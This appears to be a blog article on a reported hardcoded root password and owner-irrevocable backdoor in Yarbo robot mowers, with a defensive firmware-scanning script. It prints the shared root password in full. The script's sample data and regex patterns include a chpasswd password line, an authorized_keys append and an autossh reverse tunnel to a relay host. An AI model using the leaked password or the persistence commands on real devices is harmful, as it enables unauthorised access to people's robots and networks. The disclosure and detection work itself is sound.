Dec 5
  • security
  • iot
  • robotics
  • cybersecurity
  • the-verge

The Yarbo Robot Mower Security Scandal: Hardcoded Password, Backdoor, and The Verge Investigation

Security researchers found a fleet-wide hardcoded root password and an owner-irrevocable remote-access backdoor in Yarbo robot mowers. The Verge's report, Yarbo's response, and what it means for IoT security at large.


The "smart garden" pitch behind robot lawn mowers has just produced an ugly IoT-security story. Yarbo, a popular garden robot marketed with toolless cargo accessories, snow-blower attachments and lawn-mowing modes, is in serious trouble after security researchers found a fleet-wide hardcoded root password and a remote-access backdoor that owners cannot disable. The Verge laid out the full scope, and Yarbo's response follows a familiar industry script.

One password, thousands of robots

Researchers Makris and Petach discovered that Yarbo's firmware contains a credential updater that sets the same root password on every device. The password sits in plain text in the script: hy@8886!#, in v1.0.3 of Yarbo's own Greengrass (AWS IoT Greengrass v2) component, at userdata/greengrass/v2/packages/artifacts/credential_updater/1.0.3/x.update.credentials.sh, line 77.

What this means: every Yarbo robot in the field shares one root password, and it is not derived per device. Anyone who extracts it from a single firmware image has root on every robot they can reach, whether over the local network or through any exposed remote-access path.

Owners can't fix it — by design

This isn't just one bad password choice. Yarbo's firmware update mechanism resets the root password to the default on every update, even if the owner has manually set a stronger one. Owner-side hardening is therefore impossible: any fix lasts only until the next update.

Worse: Petach says Yarbo intentionally shipped a remote-access backdoor — "deployed automatically to every robot, cannot be disabled by the owner, and is actively restored if removed." Discovering it and deleting it isn't a fix; the firmware brings it back.

Petach's reaction in one line: "Wow, that's even worse than I thought."
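As an added illustration of how this class of defect is found in an unpacked firmware image (example code written for this note, not Yarbo's files and not the researchers' tooling): the script below walks a firmware tree, flags shell scripts that set a password from a literal embedded in the script (chpasswd, usermod -p, passwd --stdin) and flags scripts that re-install remote access on every run (authorized_keys writes, reverse SSH tunnels, tunnel agents). The directory layout, file names and script bodies it builds are constructed sample data that mimic the Greengrass artifact path quoted above; only the password string itself comes from the report.

```python
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# Shell idioms that set a password from a literal baked into the script.
# Each regex captures the account and the literal so the report can show them.
CRED_PATTERNS = [
    # echo "root:secret" | chpasswd   /   printf 'root:secret\n' | chpasswd
    re.compile(r"""(?:echo|printf)\s+['"]?(?P<user>[a-z_][a-z0-9_-]*):(?P<secret>[^'"\s|]+)['"]?\s*\|\s*(?:sudo\s+)?chpasswd"""),
    # usermod -p '$6$...' root   (pre-hashed, but still identical fleet-wide)
    re.compile(r"""usermod\s+(?:-\w+\s+)*-p\s+['"]?(?P<secret>[^'"\s]+)['"]?\s+(?P<user>[a-z_][a-z0-9_-]*)"""),
    # passwd --stdin root <<< 'secret'
    re.compile(r"""passwd\s+--stdin\s+(?P<user>[a-z_][a-z0-9_-]*)\s*<<<\s*['"]?(?P<secret>[^'"\s]+)"""),
]
# Any password-setting command at all, for lines where the source is not a literal.
PASSWORD_SET = re.compile(r"\bchpasswd\b|usermod\s+.*-p\b|passwd\s+--stdin")
# Idioms that (re)install remote access each time the script runs.
BACKDOOR_PATTERNS = [
    re.compile(r"authorized_keys"),          # appending a vendor key to root's SSH
    re.compile(r"ssh\s+.*-R\s+\d+:"),        # reverse tunnel to a vendor relay
    re.compile(r"\b(?:autossh|ngrok|frpc)\b"),
]


@dataclass
class Finding:
    path: str   # relative to the firmware root
    line: int
    kind: str   # "hardcoded-password" | "password-set" | "remote-access-persistence"
    detail: str


def is_script(path: Path) -> bool:
    """Treat *.sh/*.bash and anything starting with a shebang as shell."""
    if path.suffix in (".sh", ".bash"):
        return True
    try:
        with path.open("rb") as f:
            return f.read(2) == b"#!"
    except OSError:
        return False


def redact(secret: str) -> str:
    """Keep two characters so duplicates across files are still recognisable."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_file(path: Path, root: Path) -> list[Finding]:
    findings: list[Finding] = []
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return findings
    rel = str(path.relative_to(root))
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("#"):          # comments and the shebang line
            continue
        literal = next((m for m in (p.search(line) for p in CRED_PATTERNS) if m), None)
        if literal:
            findings.append(Finding(rel, lineno, "hardcoded-password",
                                    f"user={literal.group('user')} secret={redact(literal.group('secret'))}"))
        elif PASSWORD_SET.search(line):
            findings.append(Finding(rel, lineno, "password-set",
                                    "password set from a non-literal source; review"))
        if any(p.search(line) for p in BACKDOOR_PATTERNS):
            findings.append(Finding(rel, lineno, "remote-access-persistence", stripped[:80]))
    return findings


def scan_tree(root: Path) -> list[Finding]:
    """Walk an unpacked firmware tree and collect findings in path order."""
    out: list[Finding] = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and is_script(path):
            out.extend(scan_file(path, root))
    return out


def build_sample_tree() -> Path:
    """Constructed sample firmware tree (hypothetical files, not Yarbo's)."""
    root = Path(tempfile.mkdtemp(prefix="fw_"))
    art = root / "greengrass/v2/packages/artifacts"
    (art / "credential_updater/1.0.3").mkdir(parents=True)
    (art / "credential_updater/1.0.3/update.credentials.sh").write_text(
        "#!/bin/sh\n"
        "# constructed: sets the same root password on every unit\n"
        'echo "root:hy@8886!#" | chpasswd\n'
    )
    (art / "support_agent/2.0.0").mkdir(parents=True)
    (art / "support_agent/2.0.0/restore.sh").write_text(
        "#!/bin/sh\n"
        "mkdir -p /root/.ssh\n"
        "cat /opt/support/vendor.pub >> /root/.ssh/authorized_keys\n"
        "autossh -f -N -R 2222:localhost:22 relay@support.example.com\n"
    )
    (root / "bin").mkdir()
    (root / "bin/healthcheck.sh").write_text("#!/bin/sh\nuptime\n")   # benign control
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f"{f.kind:26} {f.path}:{f.line}  {f.detail}")
```

Run against a real unpack (binwalk or a mounted rootfs) by calling scan_tree on that directory instead of the sample; the "password-set" category is deliberately noisy so that a script which pulls the password from a variable or a file still gets a human look, since that is exactly where a fleet-wide default hides when it is not a bare literal.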

The Verge — "A hacker ran me over with a robot lawn mower"

The Verge's reporter Andreas published the story under the headline "A hacker ran me over with a robot lawn mower." A map of affected devices marks hundreds of points across California — San Francisco, Sacramento, Fresno, Bakersfield. Because the same backdoor lets a third party send remote commands, physical safety is now also on the table.

The story isn't just "my robot got hacked": the cameras, the stored WiFi PSK and any personal data kept on the device are all reachable from the same root SSH session.

Yarbo's official response

Yarbo's first email (signed "Bryan, Team Yarbo") followed the classic IoT defence: "We take these matters seriously... remote access is conducted strictly under authorized service conditions, when a customer explicitly requests assistance." A day after publication, the company announced a broader plan:

  • In-app customer approval mechanism
  • Clearer session visibility and stronger audit logging
  • Customer-facing access history
  • A dedicated Security Response Center on their website
  • A bug bounty program

The Verge's caveat is telling: "though it may stop short of disabling remote access entirely." Whether the backdoor is fully removed or merely better-logged is still unclear.

Why this matters for IoT security

This isn't a single-vendor mistake. It's a case study of structural antipatterns the connected-device market keeps repeating:

  • Hardcoded credentials — easy in development, catastrophic in production.
  • Firmware updates resetting the root password — an antipattern that makes user-side hardening impossible.
  • Owner-irrevocable remote backdoors — sold as "remote support," in practice they hollow out the concept of ownership.
  • PR defence first, real fix only when pressured — industry standard, but it collapses quickly under scrutiny from outlets like The Verge.

If you own a Yarbo today, the simplest mitigation is network isolation: put the robot on its own VLAN with no internet egress to Yarbo's cloud and no route to the rest of your LAN, so neither the vendor's remote-access path nor anyone who knows the shared root password can reach it from outside that segment. The trade-off is that the app's cloud features stop working, and the default password still works for anyone on the same VLAN. Until the company ships a complete fix, network-side isolation is the safer move.

The takeaway

Smart garden robots, robot vacuums, IP cameras, smart locks — same category. Once your device is online, the manufacturer's firmware policy is stronger than your security policy. The Yarbo scandal makes a practice the IoT market quietly tolerates suddenly visible.

What's your take — would you trust Yarbo after this? In the bigger question: would you buy a connected garden device on purpose, or pick the "no-internet" variant?